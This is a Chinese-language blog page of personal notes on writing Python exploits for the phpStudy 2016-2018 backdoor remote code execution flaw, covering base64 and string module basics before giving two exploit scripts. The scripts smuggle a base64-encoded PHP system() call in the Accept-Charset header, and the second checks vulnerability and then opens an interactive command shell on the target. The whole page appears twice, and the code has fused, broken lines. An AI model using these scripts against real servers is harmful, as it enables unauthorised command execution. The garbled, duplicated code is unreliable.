USB迷 | 专注于互联网分享

    最新消息: USBMI致力于为网友们分享Windows、安卓、IOS等主流手机系统相关的资讯以及评测、同时提供相关教程、应用、软件下载等服务。
    你的位置: 首页 > 维修 > python 编写 phpstudy

    python 编写 phpstudy

    维修 admin 25浏览 0评论

    python 编写 phpstudy

    注:个人笔记,非常简陋,仅供参考。

    名词解释
    POC
    (Proof of Concept)    		漏洞验证代码,验证漏洞的存在性。
    EXP
    (Exploit)    		渗透、攻击;
    完整的漏洞利用工具
    RCE (Remote Code|Command Execute)* 漏洞的类型
    * 在远程目标上执行代码或命令

    手工验证漏洞的问题:

    • 效率
    • 准确性

    针对RCE 漏洞开发EXP,常见的RCE 漏洞:

    • phpstudy_2016-2018_rce
    • seacms_6.26-6.28_rce
    • sangfor_edr_3.2.19_rce

    考虑将写好的EXP 集成到pocsuite3 框架中。

    常见模块介绍

    base64

    base64 模块就是用来进行base64 编解码操作的模块。

    base64 编码

    直接利用模块中函数即可,注意使用二进制形式进行编码。

    >>> import base64
>>> s = '''system("whoami");'''
>>> base64.b64encode(s.encode())   #  .encode() 字符串转换成二进制数据
b'c3lzdGVtKCJ3aG9hbWkiKTs='
>>> base64.b64encode(s.encode()).decode()
'c3lzdGVtKCJ3aG9hbWkiKTs='
>>>

    base64 解码

    直接使用函数即可。

    解码不需要转换成二进制

    >>> import base64
>>> s = "c3lzdGVtKCJ3aG9hbWkiKTs="
>>> base64.b64decode(s)
b'system("whoami");'
>>> base64.b64decode(s).decode()
'system("whoami");'
>>>

    string

    字符集合模块。

    >>> import string
>>> string.
string.Formatter(       string.ascii_uppercase  string.octdigits
string.Template(        string.capwords(        string.printable
string.ascii_letters    string.digits           string.punctuation
string.ascii_lowercase  string.hexdigits        string.whitespace
>>> string.printable    # 可打印字符
'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c'
>>> string.printable.strip()
'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
>>>

    常规EXP 编写

    phpstudy_2016-2018_rce

    漏洞利用脚本

    # phpstudy_2016-2018_rce"""
GET /phpinfo.php HTTP/1.1
Host: 10.4.7.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept-Encoding: gzip,deflate
Accept-Charset: """import requests
import base64url = ".php"cmd = "net user"cmd = f"system('{cmd}');"cmd = base64.b64encode(cmd.encode()).decode()headers = {"User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36","Accept-Encoding"   : "gzip,deflate","Accept-Charset"    : f"{cmd}"
}res = requests.get(url = url, headers = headers)html = res.content.decode("GBK")  #windows系统对中文的编码就是GBK编码offset = html.find("<!DOCTYPE html")result = html[0:offset]print(result)

    进阶脚本

    • 漏洞存在性测试:无损;
    • 循环执行命令。
    # phpstudy_2016-2018_rceimport requests
import base64
import sys
import re
import random
import stringbanner = """
PHPStudy_2016-2018( )                  ( )        ( )                    | |_      _ _    ___ | |/')    _| |   _      _    _ __ | '_`\  /'_` ) /'___)| , <   /'_` | /'_`\  /'_`\ ( '__)| |_) )( (_| |( (___ | |\`\ ( (_| |( (_) )( (_) )| |   (_,__/'`\__,_)`\____)(_) (_)`\__,_)`\___/'`\___/'(_)   - ZS
Usage: python3 *.py .php
"""def attack(cmd, url):cmd = f'''system("{cmd}");'''cmd = base64.b64encode(cmd.encode()).decode()headers = {"User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36","Accept-Encoding"   : "gzip,deflate","Accept-Charset"    : f"{cmd}"}res = requests.get(url = url, headers = headers)html = res.content.decode()offset = html.find("<!DOCTYPE html")result = html[0:offset].strip()return resultdef gen_random_str(l):s = ""for i in range(l):is += random.choice(string.ascii_letters)return skdef verify(url):random_str = gen_random_str(32)cmd = f"echo {random_str}"if random_str in attack(cmd, url):return Trueelse:return Falseif len(sys.argv) < 2:print(banner)exit()url = sys.argv[1]print(f"Target: {url}")if not verify(url):print(f"The Target is NOT VULNERABLE!")exit()flag = input(f"The Target is VULNERABLE!\nCould you want to continue?[Y/n]")if flag == "n":exit()info = re.findall(r'http://(.*)/', url)[0]while True:cmd = input(f"<{info}> ")if cmd == "exit":breakprint(attack(cmd, url))

    python 编写 phpstudy

    注:个人笔记,非常简陋,仅供参考。

    名词解释
    POC
    (Proof of Concept)    		漏洞验证代码,验证漏洞的存在性。
    EXP
    (Exploit)    		渗透、攻击;
    完整的漏洞利用工具
    RCE (Remote Code|Command Execute)* 漏洞的类型
    * 在远程目标上执行代码或命令

    手工验证漏洞的问题:

    • 效率
    • 准确性

    针对RCE 漏洞开发EXP,常见的RCE 漏洞:

    • phpstudy_2016-2018_rce
    • seacms_6.26-6.28_rce
    • sangfor_edr_3.2.19_rce

    考虑将写好的EXP 集成到pocsuite3 框架中。

    常见模块介绍

    base64

    base64 模块就是用来进行base64 编解码操作的模块。

    base64 编码

    直接利用模块中函数即可,注意使用二进制形式进行编码。

    >>> import base64
>>> s = '''system("whoami");'''
>>> base64.b64encode(s.encode())   #  .encode() 字符串转换成二进制数据
b'c3lzdGVtKCJ3aG9hbWkiKTs='
>>> base64.b64encode(s.encode()).decode()
'c3lzdGVtKCJ3aG9hbWkiKTs='
>>>

    base64 解码

    直接使用函数即可。

    解码不需要转换成二进制

    >>> import base64
>>> s = "c3lzdGVtKCJ3aG9hbWkiKTs="
>>> base64.b64decode(s)
b'system("whoami");'
>>> base64.b64decode(s).decode()
'system("whoami");'
>>>

    string

    字符集合模块。

    >>> import string
>>> string.
string.Formatter(       string.ascii_uppercase  string.octdigits
string.Template(        string.capwords(        string.printable
string.ascii_letters    string.digits           string.punctuation
string.ascii_lowercase  string.hexdigits        string.whitespace
>>> string.printable    # 可打印字符
'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c'
>>> string.printable.strip()
'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
>>>

    常规EXP 编写

    phpstudy_2016-2018_rce

    漏洞利用脚本

    # phpstudy_2016-2018_rce"""
GET /phpinfo.php HTTP/1.1
Host: 10.4.7.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept-Encoding: gzip,deflate
Accept-Charset: """import requests
import base64url = ".php"cmd = "net user"cmd = f"system('{cmd}');"cmd = base64.b64encode(cmd.encode()).decode()headers = {"User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36","Accept-Encoding"   : "gzip,deflate","Accept-Charset"    : f"{cmd}"
}res = requests.get(url = url, headers = headers)html = res.content.decode("GBK")  #windows系统对中文的编码就是GBK编码offset = html.find("<!DOCTYPE html")result = html[0:offset]print(result)

    进阶脚本

    • 漏洞存在性测试:无损;
    • 循环执行命令。
    # phpstudy_2016-2018_rceimport requests
import base64
import sys
import re
import random
import stringbanner = """
PHPStudy_2016-2018( )                  ( )        ( )                    | |_      _ _    ___ | |/')    _| |   _      _    _ __ | '_`\  /'_` ) /'___)| , <   /'_` | /'_`\  /'_`\ ( '__)| |_) )( (_| |( (___ | |\`\ ( (_| |( (_) )( (_) )| |   (_,__/'`\__,_)`\____)(_) (_)`\__,_)`\___/'`\___/'(_)   - ZS
Usage: python3 *.py .php
"""def attack(cmd, url):cmd = f'''system("{cmd}");'''cmd = base64.b64encode(cmd.encode()).decode()headers = {"User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36","Accept-Encoding"   : "gzip,deflate","Accept-Charset"    : f"{cmd}"}res = requests.get(url = url, headers = headers)html = res.content.decode()offset = html.find("<!DOCTYPE html")result = html[0:offset].strip()return resultdef gen_random_str(l):s = ""for i in range(l):is += random.choice(string.ascii_letters)return skdef verify(url):random_str = gen_random_str(32)cmd = f"echo {random_str}"if random_str in attack(cmd, url):return Trueelse:return Falseif len(sys.argv) < 2:print(banner)exit()url = sys.argv[1]print(f"Target: {url}")if not verify(url):print(f"The Target is NOT VULNERABLE!")exit()flag = input(f"The Target is VULNERABLE!\nCould you want to continue?[Y/n]")if flag == "n":exit()info = re.findall(r'http://(.*)/', url)[0]while True:cmd = input(f"<{info}> ")if cmd == "exit":breakprint(attack(cmd, url))
    继续浏览有关 的文章

    与本文相关的文章

    发布评论

    评论列表 (0)

    1. 暂无评论